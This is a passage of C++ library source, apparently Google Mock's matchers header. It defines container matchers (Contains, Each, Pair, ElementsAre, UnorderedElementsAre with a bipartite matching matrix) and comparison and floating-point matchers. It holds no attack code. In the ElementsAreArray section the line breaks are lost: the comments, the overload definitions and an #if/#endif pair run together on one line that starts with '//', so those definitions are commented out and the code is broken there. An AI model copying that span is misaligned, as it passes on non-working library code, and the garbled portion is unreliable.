    const Matcher<InnerMatcherArg> mono_tuple_matcher_;
    const RhsStlContainer rhs_;

    GTEST_DISALLOW_ASSIGN_(Impl);
  };

 private:
  const TupleMatcher tuple_matcher_;
  const RhsStlContainer rhs_;

  GTEST_DISALLOW_ASSIGN_(PointwiseMatcher);
};

// Holds the logic common to ContainsMatcherImpl and
// EachMatcherImpl.
template <typename Container>
class QuantifierMatcherImpl : public MatcherInterface<Container> {
 public:
  typedef GTEST_REMOVE_REFERENCE_AND_CONST_(Container) RawContainer;
  typedef StlContainerView<RawContainer> View;
  typedef typename View::type StlContainer;
  typedef typename View::const_reference StlContainerReference;
  typedef typename StlContainer::value_type Element;

  template <typename InnerMatcher>
  explicit QuantifierMatcherImpl(InnerMatcher inner_matcher)
      : inner_matcher_(
           testing::SafeMatcherCast<const Element&>(inner_matcher)) {}

  // Checks whether:
  // * All elements in the container match, if all_elements_should_match.
  // * Any element in the container matches, if !all_elements_should_match.
  bool MatchAndExplainImpl(bool all_elements_should_match,
                           Container container,
                           MatchResultListener* listener) const {
    StlContainerReference stl_container = View::ConstReference(container);
    size_t i = 0;
    for (typename StlContainer::const_iterator it = stl_container.begin();
         it != stl_container.end(); ++it, ++i) {
      StringMatchResultListener inner_listener;
      const bool matches = inner_matcher_.MatchAndExplain(*it, &inner_listener);

      // Short-circuits on the first counter-example (for Each) or the
      // first witness (for Contains).
      if (matches != all_elements_should_match) {
        *listener << "whose element #" << i
                  << (matches ? " matches" : " doesn't match");
        PrintIfNotEmpty(inner_listener.str(), listener->stream());
        return !all_elements_should_match;
      }
    }
    return all_elements_should_match;
  }

 protected:
  const Matcher<const Element&> inner_matcher_;

  GTEST_DISALLOW_ASSIGN_(QuantifierMatcherImpl);
};

// Implements Contains(element_matcher) for the given argument type Container.
// Symmetric to EachMatcherImpl.
template <typename Container>
class ContainsMatcherImpl : public QuantifierMatcherImpl<Container> {
 public:
  template <typename InnerMatcher>
  explicit ContainsMatcherImpl(InnerMatcher inner_matcher)
      : QuantifierMatcherImpl<Container>(inner_matcher) {}

  // Describes what this matcher does.
  virtual void DescribeTo(::std::ostream* os) const {
    *os << "contains at least one element that ";
    this->inner_matcher_.DescribeTo(os);
  }

  virtual void DescribeNegationTo(::std::ostream* os) const {
    *os << "doesn't contain any element that ";
    this->inner_matcher_.DescribeTo(os);
  }

  virtual bool MatchAndExplain(Container container,
                               MatchResultListener* listener) const {
    return this->MatchAndExplainImpl(false, container, listener);
  }

 private:
  GTEST_DISALLOW_ASSIGN_(ContainsMatcherImpl);
};

// Implements Each(element_matcher) for the given argument type Container.
// Symmetric to ContainsMatcherImpl.
template <typename Container>
class EachMatcherImpl : public QuantifierMatcherImpl<Container> {
 public:
  template <typename InnerMatcher>
  explicit EachMatcherImpl(InnerMatcher inner_matcher)
      : QuantifierMatcherImpl<Container>(inner_matcher) {}

  // Describes what this matcher does.
  virtual void DescribeTo(::std::ostream* os) const {
    *os << "only contains elements that ";
    this->inner_matcher_.DescribeTo(os);
  }

  virtual void DescribeNegationTo(::std::ostream* os) const {
    *os << "contains some element that ";
    this->inner_matcher_.DescribeNegationTo(os);
  }

  virtual bool MatchAndExplain(Container container,
                               MatchResultListener* listener) const {
    return this->MatchAndExplainImpl(true, container, listener);
  }

 private:
  GTEST_DISALLOW_ASSIGN_(EachMatcherImpl);
};

// Implements polymorphic Contains(element_matcher).
template <typename M>
class ContainsMatcher {
 public:
  explicit ContainsMatcher(M m) : inner_matcher_(m) {}

  template <typename Container>
  operator Matcher<Container>() const {
    return MakeMatcher(new ContainsMatcherImpl<Container>(inner_matcher_));
  }

 private:
  const M inner_matcher_;

  GTEST_DISALLOW_ASSIGN_(ContainsMatcher);
};

// Implements polymorphic Each(element_matcher).
template <typename M>
class EachMatcher {
 public:
  explicit EachMatcher(M m) : inner_matcher_(m) {}

  template <typename Container>
  operator Matcher<Container>() const {
    return MakeMatcher(new EachMatcherImpl<Container>(inner_matcher_));
  }

 private:
  const M inner_matcher_;

  GTEST_DISALLOW_ASSIGN_(EachMatcher);
};

// Implements Key(inner_matcher) for the given argument pair type.
// Key(inner_matcher) matches an std::pair whose 'first' field matches
// inner_matcher.  For example, Contains(Key(Ge(5))) can be used to match an
// std::map that contains at least one element whose key is >= 5.
template <typename PairType>
class KeyMatcherImpl : public MatcherInterface<PairType> {
 public:
  typedef GTEST_REMOVE_REFERENCE_AND_CONST_(PairType) RawPairType;
  typedef typename RawPairType::first_type KeyType;

  template <typename InnerMatcher>
  explicit KeyMatcherImpl(InnerMatcher inner_matcher)
      : inner_matcher_(
          testing::SafeMatcherCast<const KeyType&>(inner_matcher)) {
  }

  // Returns true iff 'key_value.first' (the key) matches the inner matcher.
  virtual bool MatchAndExplain(PairType key_value,
                               MatchResultListener* listener) const {
    StringMatchResultListener inner_listener;
    const bool match = inner_matcher_.MatchAndExplain(key_value.first,
                                                      &inner_listener);
    const internal::string explanation = inner_listener.str();
    if (explanation != "") {
      *listener << "whose first field is a value " << explanation;
    }
    return match;
  }

  // Describes what this matcher does.
  virtual void DescribeTo(::std::ostream* os) const {
    *os << "has a key that ";
    inner_matcher_.DescribeTo(os);
  }

  // Describes what the negation of this matcher does.
  virtual void DescribeNegationTo(::std::ostream* os) const {
    *os << "doesn't have a key that ";
    inner_matcher_.DescribeTo(os);
  }

 private:
  const Matcher<const KeyType&> inner_matcher_;

  GTEST_DISALLOW_ASSIGN_(KeyMatcherImpl);
};

// Implements polymorphic Key(matcher_for_key).
template <typename M>
class KeyMatcher {
 public:
  explicit KeyMatcher(M m) : matcher_for_key_(m) {}

  template <typename PairType>
  operator Matcher<PairType>() const {
    return MakeMatcher(new KeyMatcherImpl<PairType>(matcher_for_key_));
  }

 private:
  const M matcher_for_key_;

  GTEST_DISALLOW_ASSIGN_(KeyMatcher);
};

// Implements Pair(first_matcher, second_matcher) for the given argument pair
// type with its two matchers. See Pair() function below.
template <typename PairType>
class PairMatcherImpl : public MatcherInterface<PairType> {
 public:
  typedef GTEST_REMOVE_REFERENCE_AND_CONST_(PairType) RawPairType;
  typedef typename RawPairType::first_type FirstType;
  typedef typename RawPairType::second_type SecondType;

  template <typename FirstMatcher, typename SecondMatcher>
  PairMatcherImpl(FirstMatcher first_matcher, SecondMatcher second_matcher)
      : first_matcher_(
            testing::SafeMatcherCast<const FirstType&>(first_matcher)),
        second_matcher_(
            testing::SafeMatcherCast<const SecondType&>(second_matcher)) {
  }

  // Describes what this matcher does.
  virtual void DescribeTo(::std::ostream* os) const {
    *os << "has a first field that ";
    first_matcher_.DescribeTo(os);
    *os << ", and has a second field that ";
    second_matcher_.DescribeTo(os);
  }

  // Describes what the negation of this matcher does.
  virtual void DescribeNegationTo(::std::ostream* os) const {
    *os << "has a first field that ";
    first_matcher_.DescribeNegationTo(os);
    *os << ", or has a second field that ";
    second_matcher_.DescribeNegationTo(os);
  }

  // Returns true iff 'a_pair.first' matches first_matcher and 'a_pair.second'
  // matches second_matcher.
  virtual bool MatchAndExplain(PairType a_pair,
                               MatchResultListener* listener) const {
    if (!listener->IsInterested()) {
      // If the listener is not interested, we don't need to construct the
      // explanation.
      return first_matcher_.Matches(a_pair.first) &&
             second_matcher_.Matches(a_pair.second);
    }
    StringMatchResultListener first_inner_listener;
    if (!first_matcher_.MatchAndExplain(a_pair.first,
                                        &first_inner_listener)) {
      *listener << "whose first field does not match";
      PrintIfNotEmpty(first_inner_listener.str(), listener->stream());
      return false;
    }
    StringMatchResultListener second_inner_listener;
    if (!second_matcher_.MatchAndExplain(a_pair.second,
                                         &second_inner_listener)) {
      *listener << "whose second field does not match";
      PrintIfNotEmpty(second_inner_listener.str(), listener->stream());
      return false;
    }
    ExplainSuccess(first_inner_listener.str(), second_inner_listener.str(),
                   listener);
    return true;
  }

 private:
  // Streams a combined explanation of why both fields matched,
  // merging the two inner explanations into one sentence.
  void ExplainSuccess(const internal::string& first_explanation,
                      const internal::string& second_explanation,
                      MatchResultListener* listener) const {
    *listener << "whose both fields match";
    if (first_explanation != "") {
      *listener << ", where the first field is a value " << first_explanation;
    }
    if (second_explanation != "") {
      *listener << ", ";
      if (first_explanation != "") {
        *listener << "and ";
      } else {
        *listener << "where ";
      }
      *listener << "the second field is a value " << second_explanation;
    }
  }

  const Matcher<const FirstType&> first_matcher_;
  const Matcher<const SecondType&> second_matcher_;

  GTEST_DISALLOW_ASSIGN_(PairMatcherImpl);
};

// Implements polymorphic Pair(first_matcher, second_matcher).
template <typename FirstMatcher, typename SecondMatcher>
class PairMatcher {
 public:
  PairMatcher(FirstMatcher first_matcher, SecondMatcher second_matcher)
      : first_matcher_(first_matcher), second_matcher_(second_matcher) {}

  template <typename PairType>
  operator Matcher<PairType> () const {
    return MakeMatcher(
        new PairMatcherImpl<PairType>(
            first_matcher_, second_matcher_));
  }

 private:
  const FirstMatcher first_matcher_;
  const SecondMatcher second_matcher_;

  GTEST_DISALLOW_ASSIGN_(PairMatcher);
};

// Implements ElementsAre() and ElementsAreArray().
template <typename Container>
class ElementsAreMatcherImpl : public MatcherInterface<Container> {
 public:
  typedef GTEST_REMOVE_REFERENCE_AND_CONST_(Container) RawContainer;
  typedef internal::StlContainerView<RawContainer> View;
  typedef typename View::type StlContainer;
  typedef typename View::const_reference StlContainerReference;
  typedef typename StlContainer::value_type Element;

  // Constructs the matcher from a sequence of element values or
  // element matchers.
  template <typename InputIter>
  ElementsAreMatcherImpl(InputIter first, InputIter last) {
    while (first != last) {
      matchers_.push_back(MatcherCast<const Element&>(*first++));
    }
  }

  // Describes what this matcher does.
  virtual void DescribeTo(::std::ostream* os) const {
    if (count() == 0) {
      *os << "is empty";
    } else if (count() == 1) {
      *os << "has 1 element that ";
      matchers_[0].DescribeTo(os);
    } else {
      *os << "has " << Elements(count()) << " where\n";
      for (size_t i = 0; i != count(); ++i) {
        *os << "element #" << i << " ";
        matchers_[i].DescribeTo(os);
        if (i + 1 < count()) {
          *os << ",\n";
        }
      }
    }
  }

  // Describes what the negation of this matcher does.
  virtual void DescribeNegationTo(::std::ostream* os) const {
    if (count() == 0) {
      *os << "isn't empty";
      return;
    }

    *os << "doesn't have " << Elements(count()) << ", or\n";
    for (size_t i = 0; i != count(); ++i) {
      *os << "element #" << i << " ";
      matchers_[i].DescribeNegationTo(os);
      if (i + 1 < count()) {
        *os << ", or\n";
      }
    }
  }

  virtual bool MatchAndExplain(Container container,
                               MatchResultListener* listener) const {
    // To work with stream-like "containers", we must only walk
    // through the elements in one pass.

    const bool listener_interested = listener->IsInterested();

    // explanations[i] is the explanation of the element at index i.
    ::std::vector<internal::string> explanations(count());
    StlContainerReference stl_container = View::ConstReference(container);
    typename StlContainer::const_iterator it = stl_container.begin();
    size_t exam_pos = 0;
    bool mismatch_found = false;  // Have we found a mismatched element yet?

    // Go through the elements and matchers in pairs, until we reach
    // the end of either the elements or the matchers, or until we find a
    // mismatch.
    for (; it != stl_container.end() && exam_pos != count(); ++it, ++exam_pos) {
      bool match;  // Does the current element match the current matcher?
      if (listener_interested) {
        StringMatchResultListener s;
        match = matchers_[exam_pos].MatchAndExplain(*it, &s);
        explanations[exam_pos] = s.str();
      } else {
        match = matchers_[exam_pos].Matches(*it);
      }

      if (!match) {
        mismatch_found = true;
        break;
      }
    }
    // If mismatch_found is true, 'exam_pos' is the index of the mismatch.

    // Find how many elements the actual container has.  We avoid
    // calling size() s.t. this code works for stream-like "containers"
    // that don't define size().
    size_t actual_count = exam_pos;
    for (; it != stl_container.end(); ++it) {
      ++actual_count;
    }

    if (actual_count != count()) {
      // The element count doesn't match.  If the container is empty,
      // there's no need to explain anything as Google Mock already
      // prints the empty container.  Otherwise we just need to show
      // how many elements there actually are.
      if (listener_interested && (actual_count != 0)) {
        *listener << "which has " << Elements(actual_count);
      }
      return false;
    }

    if (mismatch_found) {
      // The element count matches, but the exam_pos-th element doesn't match.
      if (listener_interested) {
        *listener << "whose element #" << exam_pos << " doesn't match";
        PrintIfNotEmpty(explanations[exam_pos], listener->stream());
      }
      return false;
    }

    // Every element matches its expectation.  We need to explain why
    // (the obvious ones can be skipped).
    if (listener_interested) {
      bool reason_printed = false;
      for (size_t i = 0; i != count(); ++i) {
        const internal::string& s = explanations[i];
        if (!s.empty()) {
          if (reason_printed) {
            *listener << ",\nand ";
          }
          *listener << "whose element #" << i << " matches, " << s;
          reason_printed = true;
        }
      }
    }
    return true;
  }

 private:
  // Formats a count as "1 element" / "N elements".
  static Message Elements(size_t count) {
    return Message() << count << (count == 1 ? " element" : " elements");
  }

  size_t count() const { return matchers_.size(); }

  ::std::vector<Matcher<const Element&> > matchers_;

  GTEST_DISALLOW_ASSIGN_(ElementsAreMatcherImpl);
};

// Connectivity matrix of (elements X matchers), in element-major order.
// Initially, there are no edges.
// Use NextGraph() to iterate over all possible edge configurations.
// Use Randomize() to generate a random edge configuration.
class GTEST_API_ MatchMatrix {
 public:
  MatchMatrix(size_t num_elements, size_t num_matchers)
      : num_elements_(num_elements),
        num_matchers_(num_matchers),
        matched_(num_elements_* num_matchers_, 0) {
  }

  size_t LhsSize() const { return num_elements_; }
  size_t RhsSize() const { return num_matchers_; }
  bool HasEdge(size_t ilhs, size_t irhs) const {
    return matched_[SpaceIndex(ilhs, irhs)] == 1;
  }
  void SetEdge(size_t ilhs, size_t irhs, bool b) {
    matched_[SpaceIndex(ilhs, irhs)] = b ? 1 : 0;
  }

  // Treating the connectivity matrix as a (LhsSize()*RhsSize())-bit number,
  // adds 1 to that number; returns false if incrementing the graph left it
  // empty.
  bool NextGraph();

  void Randomize();

  string DebugString() const;

 private:
  size_t SpaceIndex(size_t ilhs, size_t irhs) const {
    return ilhs * num_matchers_ + irhs;
  }

  size_t num_elements_;
  size_t num_matchers_;

  // Each element is a char interpreted as bool. They are stored as a
  // flattened array in lhs-major order, use 'SpaceIndex()' to translate
  // a (ilhs, irhs) matrix coordinate into an offset.
  ::std::vector<char> matched_;
};

typedef ::std::pair<size_t, size_t> ElementMatcherPair;
typedef ::std::vector<ElementMatcherPair> ElementMatcherPairs;

// Returns a maximum bipartite matching for the specified graph 'g'.
// The matching is represented as a vector of {element, matcher} pairs.
GTEST_API_ ElementMatcherPairs
FindMaxBipartiteMatching(const MatchMatrix& g);

GTEST_API_ bool FindPairing(const MatchMatrix& matrix,
                            MatchResultListener* listener);

// Untyped base class for implementing UnorderedElementsAre.  By
// putting logic that's not specific to the element type here, we
// reduce binary bloat and increase compilation speed.
class GTEST_API_ UnorderedElementsAreMatcherImplBase {
 protected:
  // A vector of matcher describers, one for each element matcher.
  // Does not own the describers (and thus can be used only when the
  // element matchers are alive).
  typedef ::std::vector<const MatcherDescriberInterface*>
      MatcherDescriberVec;

  // Describes this UnorderedElementsAre matcher.
  void DescribeToImpl(::std::ostream* os) const;

  // Describes the negation of this UnorderedElementsAre matcher.
  void DescribeNegationToImpl(::std::ostream* os) const;

  bool VerifyAllElementsAndMatchersAreMatched(
      const ::std::vector<string>& element_printouts,
      const MatchMatrix& matrix,
      MatchResultListener* listener) const;

  MatcherDescriberVec& matcher_describers() {
    return matcher_describers_;
  }

  // Formats a count as "1 element" / "N elements".
  static Message Elements(size_t n) {
    return Message() << n << " element" << (n == 1 ? "" : "s");
  }

 private:
  MatcherDescriberVec matcher_describers_;

  GTEST_DISALLOW_ASSIGN_(UnorderedElementsAreMatcherImplBase);
};

// Implements unordered ElementsAre and unordered ElementsAreArray.
template <typename Container>
class UnorderedElementsAreMatcherImpl
    : public MatcherInterface<Container>,
      public UnorderedElementsAreMatcherImplBase {
 public:
  typedef GTEST_REMOVE_REFERENCE_AND_CONST_(Container) RawContainer;
  typedef internal::StlContainerView<RawContainer> View;
  typedef typename View::type StlContainer;
  typedef typename View::const_reference StlContainerReference;
  typedef typename StlContainer::const_iterator StlContainerConstIterator;
  typedef typename StlContainer::value_type Element;

  // Constructs the matcher from a sequence of element values or
  // element matchers.
  template <typename InputIter>
  UnorderedElementsAreMatcherImpl(InputIter first, InputIter last) {
    for (; first != last; ++first) {
      matchers_.push_back(MatcherCast<const Element&>(*first));
      matcher_describers().push_back(matchers_.back().GetDescriber());
    }
  }

  // Describes what this matcher does.
  virtual void DescribeTo(::std::ostream* os) const {
    return UnorderedElementsAreMatcherImplBase::DescribeToImpl(os);
  }

  // Describes what the negation of this matcher does.
  virtual void DescribeNegationTo(::std::ostream* os) const {
    return UnorderedElementsAreMatcherImplBase::DescribeNegationToImpl(os);
  }

  virtual bool MatchAndExplain(Container container,
                               MatchResultListener* listener) const {
    StlContainerReference stl_container = View::ConstReference(container);
    ::std::vector<string> element_printouts;
    MatchMatrix matrix = AnalyzeElements(stl_container.begin(),
                                         stl_container.end(),
                                         &element_printouts,
                                         listener);

    const size_t actual_count = matrix.LhsSize();
    if (actual_count == 0 && matchers_.empty()) {
      return true;
    }
    if (actual_count != matchers_.size()) {
      // The element count doesn't match.  If the container is empty,
      // there's no need to explain anything as Google Mock already
      // prints the empty container. Otherwise we just need to show
      // how many elements there actually are.
      if (actual_count != 0 && listener->IsInterested()) {
        *listener << "which has " << Elements(actual_count);
      }
      return false;
    }

    return VerifyAllElementsAndMatchersAreMatched(element_printouts,
                                                  matrix, listener) &&
           FindPairing(matrix, listener);
  }

 private:
  typedef ::std::vector<Matcher<const Element&> > MatcherVec;

  // Builds the element-x-matcher connectivity matrix: edge (i, j) is set
  // iff element #i matches matcher #j.  Also collects element printouts
  // when the listener is interested.
  template <typename ElementIter>
  MatchMatrix AnalyzeElements(ElementIter elem_first, ElementIter elem_last,
                              ::std::vector<string>* element_printouts,
                              MatchResultListener* listener) const {
    element_printouts->clear();
    ::std::vector<char> did_match;
    size_t num_elements = 0;
    for (; elem_first != elem_last; ++num_elements, ++elem_first) {
      if (listener->IsInterested()) {
        element_printouts->push_back(PrintToString(*elem_first));
      }
      for (size_t irhs = 0; irhs != matchers_.size(); ++irhs) {
        did_match.push_back(Matches(matchers_[irhs])(*elem_first));
      }
    }

    MatchMatrix matrix(num_elements, matchers_.size());
    ::std::vector<char>::const_iterator did_match_iter = did_match.begin();
    for (size_t ilhs = 0; ilhs != num_elements; ++ilhs) {
      for (size_t irhs = 0; irhs != matchers_.size(); ++irhs) {
        matrix.SetEdge(ilhs, irhs, *did_match_iter++ != 0);
      }
    }
    return matrix;
  }

  MatcherVec matchers_;

  GTEST_DISALLOW_ASSIGN_(UnorderedElementsAreMatcherImpl);
};

// Functor for use in TransformTuple.
// Performs MatcherCast<Target> on an input argument of any type.
template <typename Target>
struct CastAndAppendTransform {
  template <typename Arg>
  Matcher<Target> operator()(const Arg& a) const {
    return MatcherCast<Target>(a);
  }
};

// Implements UnorderedElementsAre.
template <typename MatcherTuple>
class UnorderedElementsAreMatcher {
 public:
  explicit UnorderedElementsAreMatcher(const MatcherTuple& args)
      : matchers_(args) {}

  template <typename Container>
  operator Matcher<Container>() const {
    typedef GTEST_REMOVE_REFERENCE_AND_CONST_(Container) RawContainer;
    typedef typename internal::StlContainerView<RawContainer>::type View;
    typedef typename View::value_type Element;
    typedef ::std::vector<Matcher<const Element&> > MatcherVec;
    MatcherVec matchers;
    matchers.reserve(::testing::tuple_size<MatcherTuple>::value);
    TransformTupleValues(CastAndAppendTransform<const Element&>(), matchers_,
                         ::std::back_inserter(matchers));
    return MakeMatcher(new UnorderedElementsAreMatcherImpl<Container>(
                           matchers.begin(), matchers.end()));
  }

 private:
  const MatcherTuple matchers_;
  GTEST_DISALLOW_ASSIGN_(UnorderedElementsAreMatcher);
};

// Implements ElementsAre.
template <typename MatcherTuple>
class ElementsAreMatcher {
 public:
  explicit ElementsAreMatcher(const MatcherTuple& args) : matchers_(args) {}

  template <typename Container>
  operator Matcher<Container>() const {
    typedef GTEST_REMOVE_REFERENCE_AND_CONST_(Container) RawContainer;
    typedef typename internal::StlContainerView<RawContainer>::type View;
    typedef typename View::value_type Element;
    typedef ::std::vector<Matcher<const Element&> > MatcherVec;
    MatcherVec matchers;
    matchers.reserve(::testing::tuple_size<MatcherTuple>::value);
    TransformTupleValues(CastAndAppendTransform<const Element&>(), matchers_,
                         ::std::back_inserter(matchers));
    return MakeMatcher(new ElementsAreMatcherImpl<Container>(
                           matchers.begin(), matchers.end()));
  }

 private:
  const MatcherTuple matchers_;
  GTEST_DISALLOW_ASSIGN_(ElementsAreMatcher);
};

// Implements UnorderedElementsAreArray().
template <typename T>
class UnorderedElementsAreArrayMatcher {
 public:
  UnorderedElementsAreArrayMatcher() {}

  template <typename Iter>
  UnorderedElementsAreArrayMatcher(Iter first, Iter last)
      : matchers_(first, last) {}

  template <typename Container>
  operator Matcher<Container>() const {
    return MakeMatcher(
        new UnorderedElementsAreMatcherImpl<Container>(matchers_.begin(),
                                                       matchers_.end()));
  }

 private:
  ::std::vector<T> matchers_;

  GTEST_DISALLOW_ASSIGN_(UnorderedElementsAreArrayMatcher);
};

// Implements ElementsAreArray().
template <typename T>
class ElementsAreArrayMatcher {
 public:
  template <typename Iter>
  ElementsAreArrayMatcher(Iter first, Iter last) : matchers_(first, last) {}

  template <typename Container>
  operator Matcher<Container>() const {
    return MakeMatcher(new ElementsAreMatcherImpl<Container>(
        matchers_.begin(), matchers_.end()));
  }

 private:
  const ::std::vector<T> matchers_;

  GTEST_DISALLOW_ASSIGN_(ElementsAreArrayMatcher);
};

// Returns the description for a matcher defined using the MATCHER*()
// macro where the user-supplied description string is "", if
// 'negation' is false; otherwise returns the description of the
// negation of the matcher.  'param_values' contains a list of strings
// that are the print-out of the matcher's parameters.
GTEST_API_ string FormatMatcherDescription(bool negation,
                                           const char* matcher_name,
                                           const Strings& param_values);

}  // namespace internal

// ElementsAreArray(first, last)
// ElementsAreArray(pointer, count)
// ElementsAreArray(array)
// ElementsAreArray(vector)
// ElementsAreArray({ e1, e2, ..., en })
//
// The ElementsAreArray() functions are like ElementsAre(...), except
// that they are given a homogeneous sequence rather than taking each
// element as a function argument. The sequence can be specified as an
// array, a pointer and count, a vector, an initializer list, or an
// STL iterator range. In each of these cases, the underlying sequence
// can be either a sequence of values or a sequence of matchers.
// // All forms of ElementsAreArray() make a copy of the input matcher sequence. template <typename Iter> inline internal::ElementsAreArrayMatcher< typename ::std::iterator_traits<Iter>::value_type> ElementsAreArray(Iter first, Iter last) { typedef typename ::std::iterator_traits<Iter>::value_type T; return internal::ElementsAreArrayMatcher<T>(first, last); } template <typename T> inline internal::ElementsAreArrayMatcher<T> ElementsAreArray( const T* pointer, size_t count) { return ElementsAreArray(pointer, pointer + count); } template <typename T, size_t N> inline internal::ElementsAreArrayMatcher<T> ElementsAreArray( const T (&array)[N]) { return ElementsAreArray(array, N); } template <typename T, typename A> inline internal::ElementsAreArrayMatcher<T> ElementsAreArray( const ::std::vector<T, A>& vec) { return ElementsAreArray(vec.begin(), vec.end()); } #if GTEST_HAS_STD_INITIALIZER_LIST_ template <typename T> inline internal::ElementsAreArrayMatcher<T> ElementsAreArray(::std::initializer_list<T> xs) { return ElementsAreArray(xs.begin(), xs.end()); } #endif // UnorderedElementsAreArray(first, last) // UnorderedElementsAreArray(pointer, count) // UnorderedElementsAreArray(array) // UnorderedElementsAreArray(vector) // UnorderedElementsAreArray({ e1, e2, ..., en }) // // The UnorderedElementsAreArray() functions are like // ElementsAreArray(...), but allow matching the elements in any order. 
// Core overload: builds the unordered matcher from an iterator range.
template <typename Iter>
inline internal::UnorderedElementsAreArrayMatcher<
    typename ::std::iterator_traits<Iter>::value_type>
UnorderedElementsAreArray(Iter first, Iter last) {
  typedef typename ::std::iterator_traits<Iter>::value_type T;
  return internal::UnorderedElementsAreArrayMatcher<T>(first, last);
}

// Pointer-plus-count form; forwards to the iterator-range overload.
template <typename T>
inline internal::UnorderedElementsAreArrayMatcher<T>
UnorderedElementsAreArray(const T* pointer, size_t count) {
  return UnorderedElementsAreArray(pointer, pointer + count);
}

// Native-array form; the size is deduced at compile time.
template <typename T, size_t N>
inline internal::UnorderedElementsAreArrayMatcher<T>
UnorderedElementsAreArray(const T (&array)[N]) {
  return UnorderedElementsAreArray(array, N);
}

// Vector form.
template <typename T, typename A>
inline internal::UnorderedElementsAreArrayMatcher<T>
UnorderedElementsAreArray(const ::std::vector<T, A>& vec) {
  return UnorderedElementsAreArray(vec.begin(), vec.end());
}

#if GTEST_HAS_STD_INITIALIZER_LIST_
// Brace-list form, e.g. UnorderedElementsAreArray({1, 2, 3}).
template <typename T>
inline internal::UnorderedElementsAreArrayMatcher<T>
UnorderedElementsAreArray(::std::initializer_list<T> xs) {
  return UnorderedElementsAreArray(xs.begin(), xs.end());
}
#endif

// _ is a matcher that matches anything of any type.
//
// This definition is fine as:
//
//   1. The C++ standard permits using the name _ in a namespace that
//      is not the global namespace or ::std.
//   2. The AnythingMatcher class has no data member or constructor,
//      so it's OK to create global variables of this type.
//   3. c-style has approved of using _ in this case.
const internal::AnythingMatcher _ = {};

// Creates a matcher that matches any value of the given type T.
template <typename T>
inline Matcher<T> A() { return MakeMatcher(new internal::AnyMatcherImpl<T>()); }

// Creates a matcher that matches any value of the given type T.
// An<T>() reads better than A<T>() before a noun, e.g. An<int>().
template <typename T>
inline Matcher<T> An() { return A<T>(); }

// Creates a polymorphic matcher that matches anything equal to x.
// Note: if the parameter of Eq() were declared as const T&, Eq("foo")
// wouldn't compile.
// Creates a polymorphic equality matcher.  x is taken by value so that
// string literals decay to const char* and remain usable.
template <typename T>
inline internal::EqMatcher<T> Eq(T x) { return internal::EqMatcher<T>(x); }

// Constructs a Matcher<T> from a 'value' of type T.  The constructed
// matcher matches any value that's equal to 'value'.
template <typename T>
Matcher<T>::Matcher(T value) { *this = Eq(value); }

// Creates a monomorphic matcher that matches anything with type Lhs
// and equal to rhs.  A user may need to use this instead of Eq(...)
// in order to resolve an overloading ambiguity.
//
// TypedEq<T>(x) is just a convenient short-hand for Matcher<T>(Eq(x))
// or Matcher<T>(x), but more readable than the latter.
//
// We could define similar monomorphic matchers for other comparison
// operations (e.g. TypedLt, TypedGe, and etc), but decided not to do
// it yet as those are used much less than Eq() in practice.  A user
// can always write Matcher<T>(Lt(5)) to be explicit about the type,
// for example.
template <typename Lhs, typename Rhs>
inline Matcher<Lhs> TypedEq(const Rhs& rhs) { return Eq(rhs); }

// Creates a polymorphic matcher that matches anything >= x.
template <typename Rhs>
inline internal::GeMatcher<Rhs> Ge(Rhs x) {
  return internal::GeMatcher<Rhs>(x);
}

// Creates a polymorphic matcher that matches anything > x.
template <typename Rhs>
inline internal::GtMatcher<Rhs> Gt(Rhs x) {
  return internal::GtMatcher<Rhs>(x);
}

// Creates a polymorphic matcher that matches anything <= x.
template <typename Rhs>
inline internal::LeMatcher<Rhs> Le(Rhs x) {
  return internal::LeMatcher<Rhs>(x);
}

// Creates a polymorphic matcher that matches anything < x.
template <typename Rhs>
inline internal::LtMatcher<Rhs> Lt(Rhs x) {
  return internal::LtMatcher<Rhs>(x);
}

// Creates a polymorphic matcher that matches anything != x.
template <typename Rhs>
inline internal::NeMatcher<Rhs> Ne(Rhs x) {
  return internal::NeMatcher<Rhs>(x);
}

// Creates a polymorphic matcher that matches any NULL pointer.
// Matches raw or smart pointers that are null.
inline PolymorphicMatcher<internal::IsNullMatcher > IsNull() {
  return MakePolymorphicMatcher(internal::IsNullMatcher());
}

// Creates a polymorphic matcher that matches any non-NULL pointer.
// This is convenient as Not(NULL) doesn't compile (the compiler
// thinks that that expression is comparing a pointer with an integer).
inline PolymorphicMatcher<internal::NotNullMatcher > NotNull() {
  return MakePolymorphicMatcher(internal::NotNullMatcher());
}

// Creates a polymorphic matcher that matches any argument that
// references variable x.  The argument must be the very same object,
// not merely an equal one.
template <typename T>
inline internal::RefMatcher<T&> Ref(T& x) {  // NOLINT
  return internal::RefMatcher<T&>(x);
}

// Creates a matcher that matches any double argument approximately
// equal to rhs, where two NANs are considered unequal.
inline internal::FloatingEqMatcher<double> DoubleEq(double rhs) {
  return internal::FloatingEqMatcher<double>(rhs, false);
}

// Creates a matcher that matches any double argument approximately
// equal to rhs, including NaN values when rhs is NaN.
inline internal::FloatingEqMatcher<double> NanSensitiveDoubleEq(double rhs) {
  return internal::FloatingEqMatcher<double>(rhs, true);
}

// Creates a matcher that matches any double argument approximately equal to
// rhs, up to the specified max absolute error bound, where two NANs are
// considered unequal.  The max absolute error bound must be non-negative.
inline internal::FloatingEqMatcher<double> DoubleNear(
    double rhs, double max_abs_error) {
  return internal::FloatingEqMatcher<double>(rhs, false, max_abs_error);
}

// Creates a matcher that matches any double argument approximately equal to
// rhs, up to the specified max absolute error bound, including NaN values when
// rhs is NaN.  The max absolute error bound must be non-negative.
inline internal::FloatingEqMatcher<double> NanSensitiveDoubleNear(
    double rhs, double max_abs_error) {
  return internal::FloatingEqMatcher<double>(rhs, true, max_abs_error);
}

// Creates a matcher that matches any float argument approximately
// equal to rhs, where two NANs are considered unequal.
inline internal::FloatingEqMatcher<float> FloatEq(float rhs) {
  return internal::FloatingEqMatcher<float>(rhs, false);
}

// Creates a matcher that matches any float argument approximately
// equal to rhs, including NaN values when rhs is NaN.
inline internal::FloatingEqMatcher<float> NanSensitiveFloatEq(float rhs) {
  return internal::FloatingEqMatcher<float>(rhs, true);
}

// Creates a matcher that matches any float argument approximately equal to
// rhs, up to the specified max absolute error bound, where two NANs are
// considered unequal.  The max absolute error bound must be non-negative.
inline internal::FloatingEqMatcher<float> FloatNear(
    float rhs, float max_abs_error) {
  return internal::FloatingEqMatcher<float>(rhs, false, max_abs_error);
}

// Creates a matcher that matches any float argument approximately equal to
// rhs, up to the specified max absolute error bound, including NaN values when
// rhs is NaN.  The max absolute error bound must be non-negative.
inline internal::FloatingEqMatcher<float> NanSensitiveFloatNear(
    float rhs, float max_abs_error) {
